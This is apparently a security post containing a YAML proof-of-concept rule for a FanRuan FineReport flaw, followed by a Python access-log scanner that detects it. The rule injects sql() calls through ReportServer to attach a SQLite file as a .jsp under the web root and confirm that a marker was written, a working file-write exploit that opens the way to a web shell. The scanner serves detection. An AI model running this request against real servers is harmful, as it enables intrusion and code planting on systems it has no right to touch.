Quake
http_path: "/webroot/decision/login"
I used the PoC posted by 甜甜圈 as a reference.
```yaml
params: []
# 帆软: FanRuan (FineReport)
name: 帆软sqlite-uploadjsp
set:
  r1: randomInt(100, 1000)
  r2: randomLowercase(6)
rules:
  # Request 1: three sql() calls attach a SQLite database file under the web root and insert the marker r1
  - method: GET
    path: /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2F{{r2}}.jsp%27%20as%20{{r2}}%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20{{r2}}.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20{{r2}}.exp2%28data%29%20VALUES%20%28%27{{r1}}%27%29%3B'),1,1)}
    headers: {}
    body:
    search: ""
    followredirects: false
    expression: |
      response.status == 302
  # Request 2: fetch the written file and check that the marker r1 is in the body
  - method: GET
    path: /webroot/{{r2}}.jsp
    headers: {}
    body:
    search: ""
    followredirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1)))
groups: {}
detail:
  author: "mlxwl"
  links: []
  # description: "Only uploads a harmless file to detect the vulnerability; please construct the exp yourself"
  description: "仅上传无害文件检测漏洞,exp还请自行构造"
  version: ""
```
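For the defending side, the two requests in the rule leave a recognisable pair of entries in the web access log. The following is an added example, not part of the original PoC: it flags `sql()` calls injected through `ReportServer` and any later `200` response for the file named in `ATTACH DATABASE`. The combined log format, the sample lines and the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Markers taken from the rule above; the access-log layout is an assumption.
TARGET_PATH = "/webroot/decision/view/ReportServer"
SQL_CALL = re.compile(r"\$\{\s*__fr_locale__\s*=\s*sql\s*\(", re.I)
ATTACH = re.compile(r"attach\s+database\s+'([^']+)'", re.I)
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webroot/decision/login HTTP/1.1" 200 512',
    "192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] \"GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fabcdef.jsp%27%20as%20abcdef%3B'),1,1)} HTTP/1.1\" 302 0",
    '192.0.2.10 - - [01/Jan/2024:10:00:06 +0000] "GET /webroot/abcdef.jsp HTTP/1.1" 200 8192',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /webroot/decision/view/ReportServer?test=s&n=en_US HTTP/1.1" 200 90',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly: the statement is encoded inside DECODE('...')."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def scan(lines):
    """Return alerts for injected sql() calls and for later hits on the attached file."""
    alerts, written = [], {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        path, query = decode_fully(parts.path), decode_fully(parts.query)
        if path == TARGET_PATH and SQL_CALL.search(query):
            attach = ATTACH.search(query)
            name = posixpath.basename(attach.group(1)) if attach else None
            if name:
                written[name] = client  # remember the file name for correlation
            alerts.append(("formula-sql", client, name, status))
        elif posixpath.basename(path) in written and status == 200:
            alerts.append(("attached-file-served", client, posixpath.basename(path), status))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

An `attached-file-served` alert means the file exists under the web root and should be removed and examined; the rule writes only a numeric marker, but the same path accepts arbitrary content.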